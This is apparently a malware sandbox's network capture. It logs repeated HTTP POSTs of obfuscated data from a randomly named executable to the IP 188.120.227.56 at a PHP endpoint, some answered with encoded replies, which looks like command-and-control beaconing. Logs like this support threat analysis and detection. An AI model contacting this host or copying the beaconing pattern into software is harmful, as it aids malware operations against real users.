Dec 10, 2024 07:34:01.035825014 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49902	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:01.283853054 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:01.635746956 CET	2536	OUT	Data Raw: 55 5b 5f 53 55 4b 56 53 5c 58 5b 56 51 5b 56 57 59 51 5e 48 56 53 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[_SUKVS\X[VQ[VWYQ^HVSTX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU +3".>V5\%?3 ((.]#="4/X.(3.,5'Z!.[),
Dec 10, 2024 07:34:01.885533094 CET	1236	OUT	Data Raw: 07 07 13 1b 3c 5c 01 27 03 28 06 2f 35 28 2d 25 04 35 06 1b 24 01 2e 21 33 06 38 04 0b 25 1c 0a 3a 15 0b 2b 33 05 2d 36 01 2f 2c 21 31 07 1f 34 21 58 14 13 33 58 02 3b 0e 2e 23 1a 2b 2a 09 38 09 3c 06 5d 32 30 1b 09 09 58 06 29 3c 54 08 2a 30 2e Data Ascii: <\'(/5(-%5$.!38%:+3-6/,!14!X3X;.#+8<]20X)<T0.)V=%$&)-?491+.P=9P0121%(%(^?(?,:<( )+>?]83P0<>-"1+;<<3;'/50=<2%,S=>>3=)?(:>>294-7)0!\*6%/4'5\0X2&$;X+164@
Dec 10, 2024 07:34:02.611169100 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:02.981307030 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49908	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:03.220360041 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:03.573149920 CET	2536	OUT	Data Raw: 55 5c 5a 50 50 43 56 5c 5c 58 5b 56 51 53 56 57 59 53 5e 43 56 5a 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U\ZPPCV\\X[VQSVWYS^CVZTX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU _)#">%5%/#!9?+-#."71,('A'=:,%'Z!.[)
Dec 10, 2024 07:34:04.555869102 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:04.791590929 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49912	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:05.041872025 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:05.401349068 CET	2536	OUT	Data Raw: 55 5d 5f 56 50 40 56 53 5c 58 5b 56 51 53 56 5e 59 51 5e 42 56 5f 54 53 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U]_VP@VS\X[VQSV^YQ^BV_TS[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#?"Z"-&*6^1?^!:<;2]6="4(.8 %.>.5'Z!.[)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49916	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:06.038563967 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:06.385684013 CET	2116	OUT	Data Raw: 55 51 5a 54 55 46 56 51 5c 58 5b 56 51 53 56 54 59 54 5e 47 56 5c 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UQZTUFVQ\X[VQSVTYT^GV\TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X<.[6&W)>'?' * ?.">"! .+/A'!_/'Z!.[)
Dec 10, 2024 07:34:07.379029036 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:07.611588001 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 57 3f 26 20 51 20 3c 3a 0f 2f 58 30 1c 25 21 27 18 3f 00 00 1c 27 39 24 14 3c 39 2f 11 21 5f 39 07 2b 17 30 03 28 01 2e 08 3f 03 2b 46 0c 1b 22 07 21 05 04 56 27 15 2a 1c 2d 2e 33 11 3d 2e 22 17 21 12 0c 09 30 02 24 01 22 2d 0d 53 2b 5f 3f 03 26 13 3b 13 3c 23 2d 0b 34 01 23 56 03 1f 26 09 28 06 3d 09 27 2f 3e 1f 32 28 05 5d 30 3b 33 5d 28 2a 2e 19 24 58 35 06 27 06 20 12 2b 21 25 13 27 2f 09 06 3e 3d 2e 51 27 09 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%W?& Q <:/X0%!'?'9$<9/!_9+0(.?+F"!V'-.3=."!0$"-S+_?&;<#-4#V&(='/>2(]0;3](.$X5' +!%'/>=.Q'#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49917	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:06.160670996 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:06.510899067 CET	2536	OUT	Data Raw: 50 5a 5a 54 55 45 56 51 5c 58 5b 56 51 5d 56 56 59 53 5e 49 56 5b 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PZZTUEVQ\X[VQ]VVYS^IV[T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU (35--*)&< _#?(95&#W(9(?';%'Z!.[)
Dec 10, 2024 07:34:07.488444090 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:07.727502108 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49922	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:07.970789909 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:08.323245049 CET	2536	OUT	Data Raw: 55 5b 5f 56 50 41 56 54 5c 58 5b 56 51 52 56 5f 59 50 5e 40 56 5f 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[_VPAVT\X[VQRV_YP^@V_TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU )#96X.>5&^2+#[+"!=7,+$=%^/%'Z!.[)
Dec 10, 2024 07:34:09.297036886 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:09.535561085 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49928	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:09.784560919 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:10.135962009 CET	2536	OUT	Data Raw: 55 5d 5f 54 55 41 53 52 5c 58 5b 56 51 52 56 5e 59 5d 5e 44 56 59 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U]_TUASR\X[VQRV^Y]^DVYT][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X(.\"."*5:_&#4'((:">= 3^.+A$>/5'Z!.[)
Dec 10, 2024 07:34:11.150826931 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:11.526758909 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49934	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:11.772135973 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:12.215055943 CET	2536	OUT	Data Raw: 55 59 5a 50 55 4b 56 5c 5c 58 5b 56 51 5d 56 5e 59 5d 5e 44 56 5f 54 5c 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UYZPUKV\\X[VQ]V^Y]^DV_T\[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X)0> .>=S*Y&/4<_<(:6=Z "3_.7A'=!\8'Z!.[)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49936	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:12.740551949 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:13.089066029 CET	2116	OUT	Data Raw: 55 58 5a 55 55 41 53 55 5c 58 5b 56 51 59 56 5e 59 57 5e 41 56 5d 54 5f 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UXZUUASU\X[VQYV^YW^AV]T_[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#<3-!=:>%&$_ $]+*_6.54W4,('B0-%\8'Z!.[)$
Dec 10, 2024 07:34:14.066977024 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:14.299182892 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 54 28 08 28 1e 22 3f 2d 54 3b 3e 2b 0a 24 1f 37 1c 2b 58 2d 01 26 04 01 01 29 29 23 59 21 00 29 07 3c 17 23 5e 28 3c 25 50 28 13 2b 46 0c 1b 22 00 21 3b 25 0d 25 28 31 0f 3a 3d 37 5a 29 13 36 5e 35 3f 31 54 33 3f 2f 11 37 3d 0d 14 28 3a 3c 5c 31 3d 3f 1e 2b 55 3a 1d 37 3b 23 56 03 1f 25 55 28 3f 04 14 27 06 21 0d 27 28 28 01 30 38 27 59 29 29 0c 16 26 2d 3e 58 24 28 0a 1d 3c 31 26 02 26 11 28 5d 3f 2d 0c 1b 25 33 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%T(("?-T;>+$7+X-&))#Y!)<#^(<%P(+F"!;%%(1:=7Z)6^5?1T3?/7=(:<\1=?+U:7;#V%U(?'!'((08'Y))&->X$(<1&&(]?-%3#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49937	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:12.860826969 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:13.213871956 CET	2536	OUT	Data Raw: 50 5b 5a 57 55 47 56 5c 5c 58 5b 56 51 58 56 53 59 55 5e 48 56 5e 54 5c 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P[ZWUGV\\X[VQXVSYU^HV^T\[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+:_"1?%!%/#9+?:_6-!714:;4%.\8'Z!.[)
Dec 10, 2024 07:34:14.199546099 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:14.431296110 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49943	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:14.948174953 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:15.307646036 CET	2536	OUT	Data Raw: 50 5b 5f 51 50 41 53 51 5c 58 5b 56 51 52 56 52 59 55 5e 44 56 5e 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P[_QPASQ\X[VQRVRYU^DV^T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X?:[6=.S=.Y'<?#<\+;9".%71<,8+A3%/5'Z!.[)
Dec 10, 2024 07:34:16.275516987 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:16.511723042 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49948	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:16.752676964 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:17.105823040 CET	2536	OUT	Data Raw: 50 5a 5f 5f 55 41 56 5d 5c 58 5b 56 51 5b 56 51 59 55 5e 42 56 53 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PZ__UAV]\X[VQ[VQYU^BVST[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ?U>\!2)6\% _!:+(*^6-)"1X-$'>9Y;%'Z!.[),
Dec 10, 2024 07:34:18.090622902 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:18.323276043 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49954	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:18.579834938 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:18.932566881 CET	2536	OUT	Data Raw: 55 5f 5f 55 55 47 56 53 5c 58 5b 56 51 5c 56 56 59 54 5e 45 56 5a 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U__UUGVS\X[VQ\VVYT^EVZT][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU <)62=5&^%?+7,?^!>&##Z.@'../5'Z!.[)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49956	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:19.428313017 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2076 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:19.776367903 CET	2076	OUT	Data Raw: 55 5d 5a 50 55 43 56 55 5c 58 5b 56 51 5a 56 57 59 54 5e 45 56 5c 54 52 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U]ZPUCVU\X[VQZVWYT^EV\TR[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+>]"=&>.2<# ++>_6= _9; %=%^,'Z!.[),
Dec 10, 2024 07:34:20.760848999 CET	25	IN	HTTP/1.1 100 Continue
